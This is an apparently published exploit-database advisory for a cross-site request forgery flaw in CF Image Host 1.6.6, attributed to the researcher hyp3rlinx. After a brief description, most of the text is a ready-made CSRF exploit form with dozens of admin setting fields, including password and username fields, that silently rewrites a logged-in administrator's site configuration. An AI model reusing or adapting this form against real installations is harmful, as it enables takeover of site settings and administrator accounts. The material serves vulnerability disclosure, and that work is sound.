CF Image Host 1.6.6 Cross Site Request Forgery Vulnerability

ID 1337DAY-ID-24549
Type zdt
Reporter hyp3rlinx
Modified 2015-11-16T00:00:00


CF Image Host version 1.6.6 suffers from a cross site request forgery vulnerability.

                                            CF Image Host 1.6.6 Cross Site Request Forgery Vulnerability


CF Image Host 1.65 - 1.6.6

Archive download listed as: version 1.65
unzips as imagehost 1.6.6

Vulnerability Details:

No CSRF protection exists allowing attackers to make requests to the server
on behalf of the victim if they are logged in and visit a malicious site or
an infected linx. This will let attackers modify certain web application
settings to
whatever the attacker wishes.

CSRF Exploit code(s):

<form id='HELL' method="POST" action="
<input type="text" name="setScriptUrl" value="" />
<input type="text" name="setTitle" value="ghostofsin" />
<input type="text" name="setSlogan" value="666" />
<input type="text" name="setCopyright" value="hyp3rlinx" />
<input type="text" name="setTheme" value="day" />
<input type="text" name="setModeRewrite" value="0" />
<input type="text" name="setAddThis" value="0" />
<input type="text" name="setLanguage" value="0" />
<input type="text" name="changesettings" value="Save+Changes" />
<input type="text" name="setModeRewrite" value="0" />
<input type="text" name="setAllowReport" value="1" />
<input type="text" name="setEmailReport" value="1" />
<input type="text" name="setHideGallery" value="1" />
<input type="text" name="setHideContact" value="1" />
<input type="text" name="setHideTos" value="1" />
<input type="text" name="setHideFaq" value="1" />
<input type="text" name="setHideSearch" value="1" />
<input type="text" name="setImageWidgit" value="1" />
<input type="text" name="setHideFeed" value="1" />
<input type="text" name="setHideSitemap" value="1" />
<input type="text" name="setAutoDeleted" value="0" />
<input type="text" name="setAutoDeletedTime" value="10" />
<input type="text" name="setAutoDeletedJump" value="m" />
<input type="text" name="setDisUpload" value="0" />
<input type="text" name="setAutoDeleted" value="0" />
<input type="text" name="setMaxSize" value="1048576" />
<input type="text" name="setMaxBandwidth" value="1024" />
<input type="text" name="setBandwidthReset" value="m" />
<input type="text" name="setMaxUpload" value="5" />
<input type="text" name="setNoDuplicate" value="0" />
<input type="text" name="setResizeImg" value="1" />
<input type="text" name="setPrivateImg" value="1" />
<input type="text" name="setWaterMark" value="0" />
<input type="text" name="setWatermarkText" value="0" />
<input type="text" name="setWatermarkImage" value="1" />
<input type="text" name="setWatermarkPlaced" value="1" />
<input type="text" name="setSUrlApi" value="b54" />
<input type="text" name="setSUrlApiUrl" value="" />
<input type="text" name="setSUrlApiUesr" value="" />
<input type="text" name="setSUrlApiPass" value="" />
<input type="text" name="setAnalytics" value="" />
<input type="text" name="setGoogleCha" value="" />
<input type="text" name="setGoogleAds" value="" />
<input type="text" name="oldPassword" value="" />
<input type="text" name="newPassword" value="" />
<input type="text" name="newConfirm" value="" />
<input type="text" name="setUserName" value="admin" />
<input type="text" name="setEmail" value="[email protected]" />


Request Method(s):        [+] POST
Vulnerable Product:       [+] CF Image Host 1.65 - 1.6.6

# [2018-04-10]  #